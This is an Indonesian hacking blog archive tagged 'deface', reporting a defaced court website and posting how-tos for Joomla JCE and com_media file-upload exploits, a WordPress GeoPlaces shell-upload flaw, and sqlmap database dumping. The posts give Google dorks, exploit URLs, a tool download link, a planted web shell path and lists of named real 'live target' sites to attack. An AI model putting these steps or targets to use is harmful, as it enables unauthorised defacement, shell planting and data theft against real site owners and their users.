Tampilkan postingan dengan label deface. Tampilkan semua postingan
Tampilkan postingan dengan label deface. Tampilkan semua postingan

Senin, 07 Oktober 2013

Situs Pengadilan Negeri II Munkid Hacked?

Situs Pengadilan Negri Klas II mungkid di restas pada tanggal: 2013/10/05
situs Pengadilan Negri Klas II  di ganti menjadi seperti ini pada url: http://pn-mungkid.go.id/sunnah.htm
 



di bagian situs itu bertulis:
"

Hacked By SultanHaikal - d3b~X - Sayaculun7 - Brian Kamikaze - Vergos303 - Coupdegrace




======================================================================


~ In the name of God the Merciful ~

We invite you to Islam, my brothers

know Islam
What is Islam?
Islam means submission, obedience, surrender and compliance with the command and prohibition of the commander without objections. Allah has named the true religion, Islam� for it is an obedience to him, submission to His Commands without any resistance, purifying acts of worship for Him, believing in His words and having faith in Him. Islam then became a proper name for the religion brought by Muhammad

Why was this religion named Islam?
Adherents of various religions all over the world have named their religions, either with the name of a man or a particular race like Christianity, which was named after Jesus Christ; and Buddhism was �?named after its founder Buddha; and Zoroastrianism was named after its founder �?and flag banner, Zoroaster. Judaism had also emerged among the tribe of Judah and so on. The All-Mighty Allah Himself called it Islam when He said,

{{Truly, the religion with All?�h is Isl?�m. (submission to His Will)}},(Holy Qur'an 3:1) It is only Islam that is not attributed to any particular man or nation. Its name indicates a special characteristic that the meaning of Islam denotes. It is evident in this name that no man has any role in bringing this religion into existence and that it is not peculiar with any nation to the exclusion of others. Its only goal is to make all people of the earth have �?characteristics of Islam. So, whoever is characterized with the qualities of Islam among ancient people and contemporary people is a Muslim, just as he shall be called a Muslim, and anyone who possesses its qualities among the coming generations.
The Message of Islam:
The most important message of Islam is the absolute Unity of God-that there is only One Supreme Being who has no partners and is not dependent on anyone or anything. He is the creator of everything and the whole universe is under His control. Since the total submission of one's will to Allah represents the essence of worship, Islam is the worship of Allah alone and the avoidance of worship directed to any person, place or thing other than Allah. In essence, Islam calls man away from the worship of creation and invites him to worship only its Creator. Allah is the only one deserving man's worship as it is only by His will that prayers are answered. Hence prayers to the non-living such as the sun, fire, and to humans whether they are Jesus, Moses or even Muhammad are rejected, as Allah informs us in the opening chapter of the Holy Qur'an,:

{{You (Alone) we worship, and You (Alone) we ask for help (for each and everything).}}( Holy Qur'an 1:4 "

Dan di bawah nya tertulis:
[#] ./Peace

[#] Greets: KhantastiC HaXoR | Hmei7 | Shadow008 | Netter | h4x0r HuSsY | Invectus | Indonesian Cyber Army | All Indonesian & All Muslims

======================================================================


Rabu, 15 Mei 2013

JCE Exploiter Dork List

Pertama download Dulu Softnya https://www.box.com/s/6irr9sluqkvzaon341m6
Dorknya :
inurl:"/index.php?option=com_jce"
inurl:index.php?option=com_virtuemart


Kemudia cari target http://www.kazan.monarh.su/ Ane pilih ini
tru site di dalam kolom soft seperti ini :


 
Click this bar to view the full image.
[Image: dIQBrtJ.png]
 


kemudian Klik start ini hasil exploitnya:


 
Click this bar to view the full image.
[Image: 7aa12e697cf147199f9dcdb.png]
 


http://www.kazan.monarh.su/images/stories/3xp.php
Oke gitu aja

 
Live target :
http://thiennguyen.vn/
http://yomeapunto.com/
http://monarh.su/
http://volga.monarh.su/
http://thonliab.promic.ac.th/

I
Part 3


Dork List New
inurl:joomla/index.php?option=com_virtuemart
inurl:uk/index.php?option=com_virtuemart
inurl:"joomla/index.php?option=com_jce"
tambahan tools 


 
[url=http://www.facebook.com/download/101489716725975/JCE%20New%20Update%20by%20no-c0de.rar]


Minggu, 12 Mei 2013

Exploit Title: Com_Media (CMS JOOMLA)



# Exploit Title: Com_Media (CMS JOOMLA)
# Date: 12-05-2013
# Author: SultanHaikal
# Version: 2.5
# Tested on: Windows Xp & Linux 
# My Friend: Hmei7 - Black Angels - Netter - Panda07.
# Dork: inurl:com_media dan site:.com inurl:com_media kembangin lagi bro :P jangan mau enaknya aja

Pertama Serach google dork nya :D
Biar ga susah" gua kasih live target nya aja deh :D
www.ayrshirebridge.co.uk
www.magicrete.in 
www.unitedwaypeel.org
www.cvbhejo.com
rockbandschoolofmusic.com
www.adriennejfurness.com
www.one-world-volunteer.net
hiddenneedle.com
www.wartakutim.com
permaculture.com.au/campus
arsomsilp.ac.th/health
www.skylinepark.org
www.gorillareisen.de
www.moclinejo.de
www.sv-mistelgau.de
www.ablogic.de

dan masih banyak lagi bro neh langsung aja ke TKP :

www.ayrshirebridge.co.uk 
nah gua pake live target web yang di atas ini coba lu tambahiin ini 
/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
jadi seperti ini  

http://www.ayrshirebridge.co.uk/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
ss:



Click Browse neh ini vuln nya file berbentuk : .txt .jpg .gif .png kalo .php dan html kayanya ngga work bro :D tapi misalnnya agan" bisa ya bagus lah di kembangin

jika bro sudah click browse nah pilih lah file anda :D contoh ss :)





nah saya browse file saya yang berbentuk .txt bernama x.txt 
lalu lu click Start upload tunggu sebentar dan selesai.

Jika ingin mengecek file kita tinggal tambahkan /images/filekita.txt 

done http://www.ayrshirebridge.co.uk/images/x.txt 

Sumber : Komandanseo


Kamis, 27 Desember 2012

WordPress GeoPlaces Themes | shell upload vulnerability

Title      : WordPress GeoPlaces Themes | shell upload vulnerability 
Author : Panda Undetected
Category : web-apps
Contact : panda-undetected@mail.com
Facebook : hozni.monsterjack
Homepage : http://4rtcode.net/
Vendor : http://www.geotheme.com/
Date : 14-Nopember-2012
Tested on : anything OS
Dork :
inurl:"/?ptype=post_listing"
inurl:"/?ptype=post_event"
inurl:"/?page=property_submit"
intext:"Geo Places Theme by"
intext:"(You can upload more than one images to create image gallery on detail page)"
===========================
exploit -->>
- http://127.0.0.1/?ptype=post_listing
- http://127.0.0.1/?ptype=post_event
- http://127.0.0.1/path/?ptype=post_listing
- http://127.0.0.1/path/?ptype=post_event
view -->>
- http://127.0.0.1/wp-content/themes/GeoPlaces/images/tmp/[here]
- http://127.0.0.1/path/wp-content/themes/GeoPlaces/images/tmp/[here]
note -->>
- null
thank's to -->>
- Allah my GOD, Muhammad my PROPHET, Indonesian Hacker.

video -->>
http://Z190T.com/video/


Minggu, 25 November 2012

Tutorial + Video Backtrack 5 Sql injection (sqlmap)

Kali ini saya akan share sql injection di Backtrack 5 dengan menggunakan sqlmap...
silahkan dilihat Videonya , untuk penjelasan baca di bawah..
maaf  jika kurang jelas ataupun ada yg salah...karena sayapun masih belajar...







- untuk membuka sqlmap buka terminal ( ctrl + t ) ketikan perintah cd /pentest/database/sqlmap
- untuk mencari nama database : ./sqlmap.py -u http://www.targetanda.com/index.php?id=100 --dbs
-u = url , --dbs = mencari database
- untuk mencari nama tables :  ./sqlmap.py -u http://www.targetanda.com/index.php?id=100 -D namadatabase --tables
 - untuk mencari column ./sqlmap.py -u http://www.targetanda.com/index.php?id=100 -D namadatabase -T namatable --columns
- terakhir untuk melihat / mengambil isi dari table ./sqlmap.py -u http://www.targetanda.com/index.php?id=100 -D namadatabase -T namatable --dump


Semoga bermanfaat :)